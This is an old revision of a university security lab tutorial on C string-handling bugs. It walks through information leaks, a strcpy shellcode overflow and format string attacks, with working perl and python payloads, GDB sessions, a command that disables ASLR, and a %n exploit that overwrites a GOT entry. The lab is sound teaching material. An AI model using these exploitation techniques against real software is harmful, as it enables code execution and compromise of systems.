This is an old revision of the document!
We will use this lab archive throughout the lab.
Please download the lab archive an then unpack it using the commands below:
student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-07.tar.gz student@mjolnir:~$ tar xzf lab-07.tar.gz
After unpacking we will get the lab-07/
folder that we will use for the lab:
student@mjolnir:~$ cd lab-07/ student@mjolnir:~/lab-07$ ls basic-format-string basic-info-leak format-string info-leak printf-features string-shellcode
This is a tutorial based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. Generally, OOP languages (like Java, C#, C++) are using classes to represent strings – this simplifies the way strings are handled and decreases the frequency of programming errors.
Conceptually, a string is sequence of characters. The representation of a string can be done in multiple ways. One of the way is to represent a string as a contiguous memory buffer. Each character is encoded in a way. For example the ASCII encoding uses 7-bit integers to encode each character – because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte.
The type for representing an ASCII character in C is char
and it uses one byte. As a side note, sizeof(char) == 1
is the only guarantee that the C standard gives.
Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). The idea is that in order to represent an Unicode string, more than one byte is needed for one character. char16_t
, char32_t
were introduced in the C standard to represent these strings. The C language also has another type, called wchar_t
, which is implementation defined and should not be used to represent Unicode characters.
Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls string manipulation functions that are assuming a specific encoding of the string.
man ascii
In C, the length of an ASCII string is given by its contents. An ASCII string ends with a 0
value byte called the NUL
byte. Every str*
function (i.e. a function with the name starting with str
, such as strcpy
, strcat
, strdup
, strstr
etc.) uses this 0
byte to detect where the string ends. As a result, not ending strings in 0
and using str*
functions leads to vulnerabilities.
Enter the basic-info-leak/
subfolder in the lab archive. It's a basic information leak example.
In basic_info_leak.c
, buf
is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives 32
bytes as input then strcpy
will copy bytes in my_string
until it finds a NUL
byte (0x00
). Because the stack grows down, on most platforms, we will start accessing the content of the stack. After the buf
variable the stack stores the old ebp
, the function return address and then the function parameters. This information is copied into my_string
. As such, printing information in my_string
(after byte index 32
) using puts()
results in information leaks.
We can test this using:
$ python -c 'print "A"*32' | ./basic_info_leak AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX�����
In order to check the hexadecimal values of the leak, we pipe the output through xxd
:
$ python -c 'print "A"*32' | ./basic_info_leak | xxd 00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000020: 786d 99ff f184 0408 0a
We have leaked two values above:
ebp
value (right after the buffer): 0xff996d78
(it's a little endian architecture); it will differ on your systemmy_main()
return address: 0x080484f1
The return address usually doesn't change (except for executables with PIE, Position Independent Executable support). But assuming ASLR is enabled, the ebp
value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the Information Leak task.
For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability.
In the string-shellcode/
subfolder in the lab archive you have a vulnerable executable dubbed string_shellcode
. The original source code is string_shellcode.c
. There is an obvious vulnerability when using strcpy()
that will lead to an overflow and a rewrite of the get_num_alpha()
function return address when called with a large enough number of characters in g_buffer
.
Fill the TODO
spots in the exploit.py
script to inject and execute a shell.
shellcode
will be stored at the beginning of the g_buffer
global variable which has a constant address. You can determine it using:
nm string_shellcode | grep ' g_buffer'
pattc
and patto
to determine the offset between l_buffer
and the get_num_alpha()
function return address.
In GDB/PEDA in order to send a given string (such as the pattern outputted by pattc
) to the program standard input, use the process substitution construct:
gdb-peda$ r < <(echo 'AAAA.....')
payload
as usual: add the shellcode, add padding and overwrite the get_num_alpha()
function return address with the address of the shellcode (i.e. the address of the g_buffer
) global variable.
We will now show how improper string handling will lead to information leaks from the memory. For this, please access the info-leak/
subfolder in the lab archive. Please browse the info-leak.c
source code file. The executable file is already generated in info-leak
(a 32-bit ELF file).
The snippet below is the relevant code snippet. The goal is to call the my_evil_func()
function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the my_evil_func()
function by overriding the return address of the my_main()
function:
#define NAME_SZ 32 static void read_name(char *name) { memset(name, 0, NAME_SZ); read(0, name, NAME_SZ); //name[NAME_SZ-1] = 0; } static void my_main(void) { char name[NAME_SZ]; read_name(name); printf("hello %s, what address to modify and with what value?\n", name); fflush(stdout); my_memory_write(); printf("Returning from main!\n"); }
What catches our eye is that the read()
function call in the read_name()
function read exactly 32
bytes. If we provide it 32
bytes it won't be null-terminated and will result in an information leak when printf()
is called in the my_main()
function.
Let's first try to see how the program works:
$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak hello AAAAAAAAAA, what address to modify and with what value?
The binary wants an input from the user using the read()
library call as we can see below:
$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512 read(0, "AAAAAAAAAA", 32) = 10 hello AAAAAAAAAA, what address to modify and with what value? read(0, "", 4) = 0 +++ exited with 255 +++
The input is read using the read()
system call. The first read expects 32 bytes. You can see already that there's another read()
call. That one is the first read()
call in the my_memory_write()
function.
As noted above, if we use exactly 32
bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let's see how that goes:
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value? $ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd 00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141 hello AAAAAAAAAA 00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA 00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh 00000030: 6174 2061 6464 7265 7373 2074 6f20 6d6f at address to mo 00000040: 6469 6679 2061 6e64 2077 6974 6820 7768 dify and with wh 00000050: 6174 2076 616c 7565 3f0a at value?.
We see we have an information leak. We leak two pieces of data above: 0x7fffffffdcf0
. The first one seems to be a stack address and the second one a code/text address.
If we run multiple times we can see that the values for the first piece of information differs:
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ',' 00000020: 4141 4141 4141 f0dc ffff ff7f 2c20 7768 AAAAAA......, wh
The variable part is related to a stack address (it starts with 0x7f
); it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents:
$ gdb -q ./info_leak Reading symbols from ./info_leak...done. gdb-peda$ b printf Breakpoint 1 at 0x400560 gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")') Starting program: info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")') [...] gdb-peda$ x/12g name 0x7fffffffdc20: 0x4141414141414141 0x4141414141414141 0x7fffffffdc30: 0x4141414141414141 0x4141414141414141 0x7fffffffdc40: 0x00007fffffffdc50 0x00000000004007aa gdb-peda$ x/2i 0x004007aa 0x4007aa <main+9>: mov edi,0x4008bc 0x4007af <main+14>: call 0x400550 <puts@plt> gdb-peda$ pdis main Dump of assembler code for function main: 0x00000000004007a1 <+0>: push rbp 0x00000000004007a2 <+1>: mov rbp,rsp 0x00000000004007a5 <+4>: call 0x400756 <my_main> 0x00000000004007aa <+9>: mov edi,0x4008bc 0x00000000004007af <+14>: call 0x400550 <puts@plt> 0x00000000004007b4 <+19>: mov eax,0x0 0x00000000004007b9 <+24>: pop rbp 0x00000000004007ba <+25>: ret End of assembler dump. gdb-peda$
From the GDB above, we determine that, after our buffer, there are two values: one value is the stored rbp
(i.e. old rbp) and one value is the return address of the my_main()
function (that gets it back to main()
).
When we leak the two values we are able to retrieve the stored rbp
value. In the above run the value of ebp
is 0x00007fffffffdc50
. We also see that the stored rbp
value is stored at address 0x7fffffffdc40
, which is the address current rbp
. We have the situation in the below diagram:
We marked the stored rbp
value (i.e. the frame pointer for main()
: 0x7fffffffdc50
) with the font color red in both places.
In short, if we leak the value of the stored rbp
(i.e. the frame pointer for main()
: 0x00007fffffffdc50
) we can determine the address where the current rbp
(i.e. the frame pointer for my_main()
: 0x7fffffffdc40
) by subtracting 16
. The address where the my_main()
return address is stored (0x7fffffffdc48
) is computed by subtracting 8
from the leaked rbp
value. By overwriting the value at this address we will force an arbitrary code execution and call my_evil_func()
.
In order to write the return address of the my_main()
function with the address of the my_evil_func()
function, make use of the conveniently (but not realistically) placed my_memory_write()
function. The my_memory_write()
allows the user to write arbitrary values to arbitrary memory addresses.
Considering all of this, update the TODO
lines of the exploit.py
script to make it call the my_evil_func()
function.
nm
to determine address of the my_evil_func()
function.
old ebp
leak and then the address of the my_main()
return address.
unpack()
function.
42
error code in the my_evil_func()
function, same as below:
$ python exploit.py [!] Could not find executable 'info_leak' in $PATH, using './info_leak' instead [+] Starting local process './info_leak': pid 6422 [*] old_ebp is 0x7fffffffdd40 [*] return address is located at is 0x7fffffffdd38 [*] Process './info_leak' stopped with exit code 42 (pid 6422)
We will now see how (im)proper use of printf
may provide us with ways of extracting information or doing actual attacks.
Calling printf
or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called format string attack.
The definition of printf
:
int printf(const char *format, ...);
Let's recap some of useful formats:
%x
and %n
are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.
printf(my_string);
The above snippet is a good example of why ignoring compile time warnings is dangerous. The given example is easily detected by a static checker.
Try to think about:
printf
(variable number of arguments)printf
stores its arguments (hint: on the stack)my_string
is "%x"
We would like to check some of the well known and not so-well known features of the printf function. Some of them may be used for information leaking and for attacks such as format string attacks.
Go into printf-features/
subfolder and browse the printf-features.c
file. Compile the executable file using:
make
and then run the resulting executable file using
./printf-features
Go through the printf-features.c
file again and check how print, length and conversion specifiers are used by printf
. We will make use of the %n
feature that allows memory writes, a requirement for attacks.
You will now do a basic format string attack using the basic-format-string/
subfolder in the lab archive. The source code is in basic_format_string.c
and the executable is in basic_format_string
.
You need to use %n
to overwrite the value of the v
variable to 200
. You have to do three steps:
v
variable using nm
.n
-th parameter of printf()
that you can write to using %n
. The buffer
variable will have to be that parameter; you will store the address of the v
variable in the buffer
variable.printf()
until %n
is matched will have to be 200
.
For the second step let's run the program multiple times and figure out where the buffer
address starts. We fill buffer
with the aaaa
string and we expect to discover it using the printf()
format specifiers.
$ ./basic_format_string AAAAAAAA %llx%llx%llx%llx%llx%llx%llx%llx%llx%llx 7fffffffdcc07fffffffdcc01f6022897ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25 $ ./basic_format_string AAAAAAAA %llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx x7fffffffdcc07fffffffdcc0116022917ffff7dd18d06c6c25786c6c25786c6c25786c6c25786c6c25786c6c25787fffffffdcc07fffffffdcc01f6022917ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a $ ./basic_format_string AAAAAAAA %llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx%llx 7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a4141414141414141
In the last run we get the 4141414141414141
representation of AAAAAAAA
. That means that, if we replace the final %lx
with %n
, we will write the address 0x4141414141414141
the number of characters processed so far:
$ echo -n '7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a' | wc -c 162
We need that number to be 200
. You can fine tune the format string by using a construct such as %32llx
to print a number on 32
characters instead of a maximum of 16
characters. See how much extra room you need and see if you reach 200
bytes.
8
for length. You may use the %32llx
or %33llx
or %42llx
. The numeric argument states the length of the print output.
After the plan is complete, write down the attack by filling the TODO
lines in the exploit.py
solution skeleton.
After you write 200 chars in v, you should obtain shell
$ python exploit64.py [!] Could not find executable 'basic_format_string' in $PATH, using './basic_format_string' instead [+] Starting local process './basic_format_string': pid 20785 [*] Switching to interactive mode 7fffffffdcc0 7fffffffdcc01f60229b7ffff7dd18d03125786c6c393425786c6c25786c6c34786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25a6e25 $
The goal of this task is to call my_evil_func
again. This task is also tutorial based.
int main(int argc, char *argv[]) { printf(argv[1]); printf("\nThis is the most useless and insecure program!\n"); return 0; }
Any string that represents a useful format (e.g. %d
, %x
etc.) can be used to discover the vulnerability.
$ ./format "%08x %08x %08x %08x" 00000000 f759d4d3 00000002 ffd59bd4 This is the most useless and insecure program!
The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as a information leakage. But we want more.
Another useful format for us is %m$
followed by any normal format selector. Which means that the m
th parameter is used as an input for the following format. %10$08x
will print the 10
th paramater with %08x
. This allows us to do a precise access of the stack.
Example:
$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x" 00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24 This is the most useless and insecure program!
Note the equivalence between formats.
Now, because we are able to select any higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer.
$ ./format "$(perl -e 'printf "%%08x\x0a"x10000')"
Depending on your setup you should be able to view the hex representation of the string ”%08x\n”.
Why do we need our own buffer? Remember the %n
format? It can be used to write at an address given as parameter. The idea is to give this address as parameter and achieve memory writing. We will see later how to control the value.
The next steps are done with ASLR disabled. In order to disable ASLR, please run
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
By trial and error or by using GDB (breakpoint on printf
) we can determine
$ ./format "$(perl -e 'printf "A"x512 . "%%08x \x0a"x200')" | grep -n 41 | head 17:415729ac 56:ffffdd41 128:41007461 129:41414141 130:41414141
#!/usr/bin/env perl use strict; use warnings; use v5.20; my $stack_items = 1000; printf "A" x 512; printf "%%08x \x0a" x $stack_items;
Then call the format
using (note the enclosing double-quotes):
$ ./format "$(perl exploit.pl)"
One idea is to keep things in multiple of 4, like I did for ”%08x \x0a”. If you are looking at line 128
, one of our A
s is there. Because the machine is little endian, the 0x41 appears as most significant byte. We want to fix this, to have our buffer aligned. Note, you can add as many format strings you want, the start of the buffer will be the same (more or less).
We can compress our buffer by specifying the position of the argument.
$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08x"')" BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342 This is the most useless and insecure program!
You can see that the last information is our “BCDE” string printed with %08x
this means that we know where's our buffer.
$ ulimit -c unlimited
mov %edx,(%eax)
or the equivalent in Intel syntax
mov DWORD PTR [eax], edx
It may be different on your system, for example edx
may be replaced by esi
, cuch as
mov DWORD PTR [eax], esi
Update the explanations below accordingly.
rm -f core
We can replace %08x
with %n
this should lead to segmentation fault.
$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08n"')" Segmentation fault (core dumped) $ gdb ./format -c core ... Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 (gdb) bt #0 0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6 #1 0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6 #2 0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18 (gdb) x/i $eip => 0xf7e580a2 <vfprintf+17906>: mov %edx,(%eax) (gdb) info registers $edx $eax edx 0x202 514 eax 0x45444342 1162101570 (gdb) quit
Bingo. We have memory write. The vulnerable code tried to write at the address 0x45444342
(“BCDE” little endian) the value 514. The value 514 is the amount of data wrote so far by printf
(510 A
s and “BCDE”).
Right now, our input string has 518 bytes. But we can further compress it, thus making the value that we write independent of the length of the input.
$ ./format "$(perl -e 'printf "BCDE". "A"x506 . "%%99x" . "%%126\$08n"')" Segmentation fault (core dumped) $ gdb ./format -c core (gdb) info registers $edx $eax edx 0x261 609 eax 0x45444342 1162101570 (gdb) quit
Here we managed to write 609 (4+506+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one A
. You can try this by yourself.
How far can we go? Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with snprintf
. 255 should be enough.
Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianess of the machine. The idea is to write at the address n and then at the address n+1 and so on.
Lets first display the address. We are using the address 0x804a008
. This address is the address of the got entry for the puts function. Basically, we will override the got entry for the puts.
$ objdump -R ./format | grep puts 0804a008 R_386_JUMP_SLOT puts $ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08x" . "%%255x|" . "%%127\$08x" . "%%255x|" . "%%128\$08x"')" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... 0|0804a008 f7e2a4d3|0804a009 2|0804a00a ffffd2c4|0804a00b This is the most useless and insecure program!
Why are we printing 498 A
s? We added 12 bytes before our format and 6 extra bytes for the output – the |
is there only for pretty print. We want to keep in place the first argument – anyway, you should always check this.
Lets replace the %x
with %n
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')" $ gdb ./format -c core Program terminated with signal 11, Segmentation fault. #0 0x02020202 in ?? () (gdb) x/x 0x0804a000 0x804a000 <printf@got.plt>: 0xf7e5ded0 (gdb) x/x 0x0804a004 0x804a004 <fwrite@got.plt>: 0x08048396 (gdb) x/x 0x0804a008 0x804a008 <puts@got.plt>: 0x02020202 (gdb) x/x 0x0804a00c 0x804a00c <__gmon_start__@got.plt>: 0x08000006 (gdb)
In the gdb session above you can see:
How come we wrote the first 0x02
?
Just before executing the first %n
the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) == 0x302.
How come the rest of the bytes are 0x02
?
After executing the first %n
we printed another 256 bytes before each %n
so we actually wrote 0x402, 0x502 and 0x602. You can see that the last three bytes __gmon_start__@got.plt
are 0x000006
.
We want to put the value 0x08048494
.
$ objdump -d ./format | grep my_evil 08048494 <my_evil_func>:
The first byte is 0x94
(little endian), recall that we were able to write 0x02
, writing 0x94
means replacing first 255 with 255-(0x102-0x94) == 145.
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')" $ gdb ./format -c core #0 0x94949494 in ?? () (gdb) quit
The next byte that we want to write is 0x84
so we need to replace 255 with 235. We can continue this idea until we profit.
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%145x|" . "%%126\$08n" . "%%239x|" . "%%127\$08n" . "%%127x|" . "%%128\$08n" . "%%259x|" . "%%129\$08n"')" | tr -s ' ' > /dev/null I'm evil, but nobody calls me :-(
[1p] Bonus task Can you get a shell? (Assume ASLR is disabled).
gets
. With gets
there is no way of knowing how much data was readn
parameter, whenever a non constant string is involved. i.e. strnprintf
, strncat
.NUL
byte is added, for instance strncpy
does not add a NUL
byte.wcstr*
functions when dealing with wide char strings.